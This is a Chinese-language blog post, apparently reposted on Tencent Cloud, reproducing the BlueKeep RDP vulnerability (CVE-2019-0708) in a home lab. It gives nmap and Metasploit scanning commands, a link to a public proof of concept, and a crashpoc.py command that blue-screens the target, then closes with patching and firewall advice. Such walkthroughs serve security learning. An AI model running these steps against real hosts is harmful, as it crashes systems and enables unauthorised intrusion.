前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2019-0708_RDP漏洞利用

CVE-2019-0708_RDP漏洞利用

作者头像
C4rpeDime
发布2022-04-26 14:45:50
1.7K0
发布2022-04-26 14:45:50
举报
文章被收录于专栏:黑白安全

漏洞简介:

基于Windows系列服务器系列漏洞,在2019年5月15日被公开,级别属于高危漏洞,利用方式简单,通过3389端口,RDP协议进行攻击。这个漏洞是今年危害严重性最大的漏洞

受影响的操作系统有:windows2003、windows2008、windows2008 R2、windows xp 、windows7

环境搭建:

靶机:Windows_sever_2012,IP :192.168.231.130

CVE 2019 0708 RDP漏洞利用  漏洞分析  第1张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第1张

渗透机:Windows10,IP :192.168.231.2,有python3.x环境.

CVE 2019 0708 RDP漏洞利用  漏洞分析  第2张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第2张

工具:360_RDP漏洞扫描工具(解压密码:qx)

POC:https://github.com/n1xbyte/CVE-2019-0708

漏洞复现:

1. nmap扫描3389端口是否开放

CVE 2019 0708 RDP漏洞利用  漏洞分析  第3张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第3张

2.漏洞扫描

  •     可以使用360提供的扫描工具:
CVE 2019 0708 RDP漏洞利用  漏洞分析  第4张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第4张

    可以看见直接爆了漏洞

  • 同样的,也可以使用msf进行扫描
代码语言:javascript
复制
msf5 > search 0708    #查找是否有 CVE-2019-0708模块如果没有,则需要更新
代码语言:javascript
复制
apt-get install Metasploit-framework #更新msf模块
代码语言:javascript
复制
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  #利用漏洞扫描模块
代码语言:javascript
复制
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options  #查看参数
代码语言:javascript
复制
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.231.143 #设置靶机IP
代码语言:javascript
复制
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run  #运行
CVE 2019 0708 RDP漏洞利用  漏洞分析  第5张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第5张

一样的,直接爆

漏洞利用:

先安装或者升级pip3(如果以前安装了,就直接安装impacket库),再安装impacket库

代码语言:javascript
复制
python -m pip install -U pip

我的已经更新过了.

CVE 2019 0708 RDP漏洞利用  漏洞分析  第6张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第6张

安装impacket库

代码语言:javascript
复制
pip3 install impacket
CVE 2019 0708 RDP漏洞利用  漏洞分析  第7张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第7张

2. 下载CVE-2019-0708,并进入该目录

CVE 2019 0708 RDP漏洞利用  漏洞分析  第8张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第8张

3. 最后,就是攻击了.

代码语言:javascript
复制
python crashpoc.py 192.168.231.130 64  #python crashpoc.py ip地址 系统类型
CVE 2019 0708 RDP漏洞利用  漏洞分析  第9张
CVE 2019 0708 RDP漏洞利用 漏洞分析 第9张

在发动攻击的瞬间,靶机蓝屏了.这个东西,威力挺大的

写在最后:

这个漏洞能做的事情,远远没有重启这么简单,建议:

  1. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
  2. 及时打对应系统的安全补丁
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-10-28),如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
漏洞扫描服务
漏洞扫描服务(Vulnerability Scan Service,VSS) 是一款自动探测企业网络资产并识别其风险的产品。依托腾讯二十年累积的安全能力,漏洞扫描服务能够对企业的网络设备及应用服务的可用性、安全性与合规性等进行定期的安全扫描、持续性风险预警和漏洞检测,并且为企业提供专业的修复建议,降低企业安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档